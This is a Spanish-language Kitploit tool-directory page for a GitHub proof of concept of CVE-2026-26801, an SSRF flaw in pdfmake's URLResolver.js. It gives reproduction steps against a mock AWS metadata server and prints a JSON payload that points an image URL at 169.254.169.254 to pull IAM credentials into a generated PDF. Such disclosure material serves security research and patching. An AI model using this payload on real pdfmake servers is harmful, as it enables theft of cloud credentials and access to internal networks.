Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-26801-pdfmake-ssrf — PoC para CVE-2026-26801: SSRF en pdfmake URLResolver.js (>= 0.3.0-beta.2, <= 0.3.5) | Kitploit
Herramientas/GitHubGitHub/mariopepe/cve-2026-26801-pdfmake-ssrf
Análisis de VulnerabilidadesExplotaciónRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubmariopepe/cve-2026-26801-pdfmake-ssrf

CVE-2026-26801-pdfmake-ssrf

PoC para CVE-2026-26801: SSRF en pdfmake URLResolver.js (>= 0.3.0-beta.2, <= 0.3.5)

Ver Repositorio
hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC de Vulnerabilidad SSRF en pdfmake

Resumen de la Vulnerabilidad

CampoValor
Paquetepdfmake
Versión>= 0.3.0-beta.2, <= 0.3.5
Corregida0.3.6
CVECVE-2026-26801
TipoServer-Side Request Forgery (SSRF)
Ubicaciónsrc/URLResolver.js
SeveridadALTA

Causa Raíz

root@kitploit:~
// URLResolver.js line 3
const response = await fetch(url, { headers });  // NO VALIDATION!

Cuando docDefinition contiene URLs en images, attachments, o files, pdfmake las obtiene sin ninguna validación:

  • Sin lista blanca/negra de dominios
  • Sin protección contra IPs internas (127.0.0.1, 169.254.169.254, 10.x.x.x)
  • Cabeceras personalizadas soportadas (permite bypass de autenticación)

Reproducción

Configuración

root@kitploit:~
npm install

Terminal 1 - Servidor Mock de Metadatos AWS

root@kitploit:~
npm run metadata

Terminal 2 - Servidor PDF Vulnerable

root@kitploit:~
npm run server

Terminal 3 - Ejecutar el Ataque

SSRF Ciego (demuestra que el servidor realiza peticiones salientes):

root@kitploit:~
npm run attack

SSRF de Lectura Completa (credenciales incrustadas en el PDF generado):

root@kitploit:~
npm run exfiltrate

Resultados Esperados

SSRF Ciego (npm run attack)

Salida del Servidor de Metadatos:

root@kitploit:~
[METADATA] GET /latest/meta-data/iam/security-credentials/vulnerable-ec2-role
[METADATA] >>> CREDENTIALS LEAKED! <<<

Esto demuestra que el servidor vulnerable realizó una petición saliente a nuestro endpoint controlado.

SSRF de Lectura Completa (npm run exfiltrate)

El script de ataque genera exfiltrated.pdf. Ábrelo en cualquier visor de PDF y el JSON de credenciales AWS estará incrustado como adjunto de archivo (metadata.json). Esto demuestra exfiltración completa de datos, no solo SSRF ciego. El atacante obtiene el cuerpo real de la respuesta dentro del PDF.

Impacto en el Mundo Real

  1. Robo de Credenciales AWS/GCP/Azure - Acceso a endpoints de metadatos en la nube
  2. Acceso a Red Interna - Alcanzar servicios internos
  3. Escaneo de Puertos - Enumerar infraestructura interna
  4. Bypass de Autenticación - Cabeceras personalizadas para evadir autenticación

Payload del Ataque

root@kitploit:~
{
  "content": ["Hello"],
  "images": {
    "x": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
  }
}

Writeup

Writeup técnico completo con la historia de cómo se encontró, la cadena de ataque y el cronograma de divulgación: mariopepe.github.io/cve-2026-26801-pdfmake-ssrf

Descargar herramienta